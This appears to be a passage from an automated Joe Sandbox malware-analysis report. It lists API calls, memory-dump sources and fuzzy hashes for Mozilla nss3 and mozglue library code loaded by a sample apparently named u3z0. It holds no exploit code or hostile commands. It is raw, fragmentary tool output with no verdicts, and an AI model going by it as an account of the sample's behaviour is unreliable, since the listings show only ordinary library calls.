                                                                                                                                                                                                                                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C874F7A
                                                                                                                                                                                                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C874F89
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C874FC8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2843999940-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3396b6b36d0f4fd0b131617039788cf3033c50502de49a48071cdd265ff358ef
                                                                                                                                                                                                                                                                                        • Instruction ID: ee6e19c446f9f3cf55c3a11846abe99ef4afe9bbc0eeb89fda9cf8075f837a1f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3396b6b36d0f4fd0b131617039788cf3033c50502de49a48071cdd265ff358ef
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2818171A083019FE731CF28DA80B5EB7E4ABC5358F148929F958DB641F731E9048FA2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C755E9D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7656EE,?,00000001), ref: 6C765B85
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: EnterCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765B90
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: LeaveCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765BD8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: GetTickCount64.KERNEL32 ref: 6C765BE4
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C755EAB
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C755EB8
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C755ECF
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C756017
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C744310: moz_xmalloc.MOZGLUE(00000010,?,6C7442D2), ref: 6C74436A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C744310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C7442D2), ref: 6C744387
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000004), ref: 6C755F47
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C755F53
                                                                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 6C755F5C
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C755F66
                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C755F7E
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000024), ref: 6C755F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: mozalloc_abort.MOZGLUE(?), ref: 6C75CAA2
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C78F968), ref: 6C755E8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C78F968), ref: 6C75605D
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C78F968), ref: 6C7560CC
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3711609982-0
                                                                                                                                                                                                                                                                                        • Opcode ID: be5f49f302d8a5140115b20d8af7007c17b3a79458c1fb02f5cb23716d430723
                                                                                                                                                                                                                                                                                        • Instruction ID: e84f34966e69ba20ab1a927d71bd3c96b6497819f69e32de012831628fed3dc2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be5f49f302d8a5140115b20d8af7007c17b3a79458c1fb02f5cb23716d430723
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D71E4B06047418FD750DF28D584A6ABBF0FF59304F54493DE48A8BB52DB31EA58CB92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C79D4F0
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D4FC
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D52A
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C79D530
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D53F
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D55F
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C79D585
                                                                                                                                                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C79D5D3
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C79D5F9
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D605
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D652
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C79D658
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D667
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D6A2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2206442479-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 99667f58460a0c249e05e2719a8b1532548c23c7bb68e8e477841de01d1bdef4
                                                                                                                                                                                                                                                                                        • Instruction ID: 8d48de99252979f797df25cd4b8fc170e6b7ba301e4291f1679cb0d0fe7c78d6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99667f58460a0c249e05e2719a8b1532548c23c7bb68e8e477841de01d1bdef4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37515B71604706DFC704DF34C988A9ABBB8FF89358F108A2EE85A87711DB30B945CB91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C8A781D,00000000,6C89BE2C,?,6C8A6B1D,?,?,?,?,00000000,00000000,6C8A781D), ref: 6C8A6C40
                                                                                                                                                                                                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C8A781D,?,6C89BE2C,?), ref: 6C8A6C58
                                                                                                                                                                                                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C8A781D), ref: 6C8A6C6F
                                                                                                                                                                                                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C8A6C84
                                                                                                                                                                                                                                                                                        • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C8A6C96
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C851240: TlsGetValue.KERNEL32(00000040,?,6C85116C,NSPR_LOG_MODULES), ref: 6C851267
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C851240: EnterCriticalSection.KERNEL32(?,?,?,6C85116C,NSPR_LOG_MODULES), ref: 6C85127C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C851240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C85116C,NSPR_LOG_MODULES), ref: 6C851291
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C851240: PR_Unlock.NSS3(?,?,?,?,6C85116C,NSPR_LOG_MODULES), ref: 6C8512A0
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C8A6CAA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                                                                                        • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                                                                                        • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                                                                                        • Opcode ID: b523e5d6233dc13825b7dfca5829fcda98fd5fca4ad08220849a33b8a3bbd0bd
                                                                                                                                                                                                                                                                                        • Instruction ID: f925f19632f3d47c4e18949d547205115c5bace051b7b1bc3cfa285faa95d557
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b523e5d6233dc13825b7dfca5829fcda98fd5fca4ad08220849a33b8a3bbd0bd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2801F2E170630177E76027FD2ECAF23315C9F81548F280831FE08E4989EA92EA1640A9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
• Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 786543732-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 85c8371230b1fdec5799801b5490557530aca62009eb77a2464d793344ae1467
                                                                                                                                                                                                                                                                                        • Instruction ID: 484387e0be42da059629bdccb403f9f55211246775443bc59ce7bb1bd4e045fe
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85c8371230b1fdec5799801b5490557530aca62009eb77a2464d793344ae1467
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 555191B1B0511A9BDF60EF58CE856FE77B4BB06349F640825D804A3B01D3B1EA24CBE5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C7656D1
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7656E9
                                                                                                                                                                                                                                                                                        • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C7656F1
                                                                                                                                                                                                                                                                                        • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C765744
                                                                                                                                                                                                                                                                                        • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C7657BC
                                                                                                                                                                                                                                                                                        • GetTickCount64.KERNEL32 ref: 6C7658CB
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C7658F3
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C765945
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C7659B2
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C7CF638,?,?,?,?), ref: 6C7659E9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
• Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                                                                                                                                                                                        • String ID: MOZ_APP_RESTART
                                                                                                                                                                                                                                                                                        • API String ID: 2752551254-2657566371
                                                                                                                                                                                                                                                                                        • Opcode ID: 7c35040172e925ff344435924e146efb6fbd511b2d250cd459f20984d584e574
                                                                                                                                                                                                                                                                                        • Instruction ID: 1cf5e7c0c0f190e1e28d900697973822453e61dfe3419603d96841892d04808e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c35040172e925ff344435924e146efb6fbd511b2d250cd459f20984d584e574
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5C1AD31A087419FCB05CF28C54066ABBF1FFCA714F058A2DE8C5A7B21D730A985DB82
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • sqlite3_value_text16.NSS3(?), ref: 6C934CAF
                                                                                                                                                                                                                                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C934CFD
                                                                                                                                                                                                                                                                                        • sqlite3_value_text16.NSS3(?), ref: 6C934D44
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
• Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                                                                                        • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                                                                                        • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                                                                                        • Opcode ID: 309982f2c9c085c30a4ab3c83aaddc1119d43ced4f75263160428a5615f26b62
                                                                                                                                                                                                                                                                                        • Instruction ID: 7a7163a095799f65987f9802c33db2d1b49306e18529cf77af13011616ba8763
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 309982f2c9c085c30a4ab3c83aaddc1119d43ced4f75263160428a5615f26b62
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A313773A09931A7D715462898017E57B69BBC2318F1B2535D82C4BE54DB23FC61CFE2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78EC84
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78EC8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78ECA1
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78ECAE
                                                                                                                                                                                                                                                                                        • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C78ECC5
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78ED0A
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C78ED19
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C78ED28
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C78ED2F
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78ED59
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_ensure_started, xrefs: 6C78EC94
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                                                        • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                                                                                                                        • API String ID: 4057186437-125001283
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(6C883F23,?,6C87E477,?,?,?,00000001,00000000,?,?,6C883F23,?), ref: 6C882C62
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,6C87E477,?,?,?,00000001,00000000,?,?,6C883F23,?), ref: 6C882C76
                                                                                                                                                                                                                                                                                        • PL_HashTableLookup.NSS3(00000000,?,?,6C87E477,?,?,?,00000001,00000000,?,?,6C883F23,?), ref: 6C882C86
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(00000000,?,?,?,?,6C87E477,?,?,?,00000001,00000000,?,?,6C883F23,?), ref: 6C882C93
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: TlsGetValue.KERNEL32 ref: 6C90DD8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C90DDB4
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,6C87E477,?,?,?,00000001,00000000,?,?,6C883F23,?), ref: 6C882CC6
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C87E477,?,?,?,00000001,00000000,?,?,6C883F23,?), ref: 6C882CDA
                                                                                                                                                                                                                                                                                        • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C87E477,?,?,?,00000001,00000000,?,?,6C883F23), ref: 6C882CEA
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C87E477,?,?,?,00000001,00000000,?), ref: 6C882CF7
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C87E477,?,?,?,00000001,00000000,?), ref: 6C882D4D
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C882D61
                                                                                                                                                                                                                                                                                        • PL_HashTableLookup.NSS3(?,?), ref: 6C882D71
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?), ref: 6C882D7E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C7E204A), ref: 6C8507AD
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C7E204A), ref: 6C8507CD
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C7E204A), ref: 6C8507D6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C7E204A), ref: 6C8507E4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,6C7E204A), ref: 6C850864
